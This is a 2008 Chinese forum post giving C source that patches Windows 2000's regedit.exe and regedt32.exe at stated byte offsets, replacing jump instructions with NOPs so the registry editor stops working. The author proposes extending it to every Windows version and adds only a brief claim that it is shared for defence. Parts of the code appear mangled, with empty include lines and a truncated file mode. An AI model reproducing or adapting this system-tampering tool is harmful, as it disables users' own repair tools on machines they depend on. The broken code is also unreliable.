中华人民 发表于 2008-12-16 10:08:42

注册表终极操作—锁定注册表

<P>  你有没有遇到注册表被锁定,无法打开注册表来手工修复呢?很多人都为这个头疼吧,相信你被锁定一次就知道他的操作原理了:</P>

<P>  修改下的DisableRegistryTools值为1</P>

<P>  解锁的方法也有几种,比如程序用API函数调用注册表直接删除,做一个REG文件直接导入,写一个脚本…………</P>

<P>  今天我就教大家写个程序来实现另类锁定,是不是很好奇了?跟我来。</P>

<P>  实验环境:windows2000<BR>  实验目的:锁定注册表(本方法利用了Cracker的思路来实现,直接让程序修改程序指令,使调用注册表程序禁止。)<BR>  实现方法:C程序</P>

<P>  首先我们要按照Cracker的思路反汇编WINNT下的regedit.exe和regedt32.exe找到跳转指令,怎么得到这些信息不是我们今天的目的,这里我就不详细介绍了,以下是我反汇编找到的跳转地址:<BR>  1.regedit.exe<BR>偏移地址:0x69CA 将指令:0x74 0x1A 修改成:0x90 0x90</P>

<P>  2.regedt32.exe<BR>偏移地址:0x10bf2 将指令:0x74 0x52 修改成:0x90 0x90</P>

<P>  现在我们用程序把这2个偏移地址的指令给修改成0x90 0x90 ( 0x90代表nop,就是让程序什么也不做,执行下一条指令)让我们看看程序是如何实现的吧。</P>

<P>#include <BR>#include <BR>bool scanreg(const char *file,long offset, int length,char *the); /*函数说明*/</P>

<P>main()<BR>{ <BR>char the[]={ 0x90,0x90 }; <BR>scanreg("C:\\WINNT\\regedit.exe",0x69CA,0x02,the); /*调用函数修改winnt下的regedit.exe 其中的0x02是修改长度*/<BR>scanreg("C:\\WINNT\\ServicePackFiles\\i386\\regedit.exe",0x69CA,0x02,the); /*调用函数改变补丁下regedit.exe*/<BR>scanreg("C:\\WINNT\\system32\\regedt32.exe",0x10bf2,0x02,the); /*调用函数修改system32下的regedt32.exe */<BR>scanreg("C:\\WINNT\\ServicePackFiles\\i386\\regedt32.exe",0x10bf2,0x02,the); /*调用函数改变补丁下regedt32.exe*/<BR>}<BR>bool scanreg(const char *file,long offset, int length,char *the) <BR>{ <BR>FILE *fp = NULL; <BR>bool result=false; <BR>if((fp=fopen(file,"rb "))!=NULL) /*打开文件进行读写操作*/<BR>{ <BR>fseek(fp,offset,1); /*把指针指向我们定义的偏移地址*/<BR>fwrite(the,length,1,fp); /*修改程序,把指令替换成0x90*/<BR>fclose(fp); /*关闭文件*/<BR>result=true; <BR>}<BR>return(result); <BR>}</P>

<P>  好了,我这里只是一个示范,只适合2000系统,把windows每种系统的注册表调用程序都分析一下,然后在程序开始用API函数GetVersionEx(LPOSVERSIONINFO lpVersionInfo)判断系统,根据判断的系统来调用相应的修改函数。那不是通杀windows了?上面把方法公布出来,以便大家做好防范。</P> <
页: [1]
查看完整版本: 注册表终极操作—锁定注册表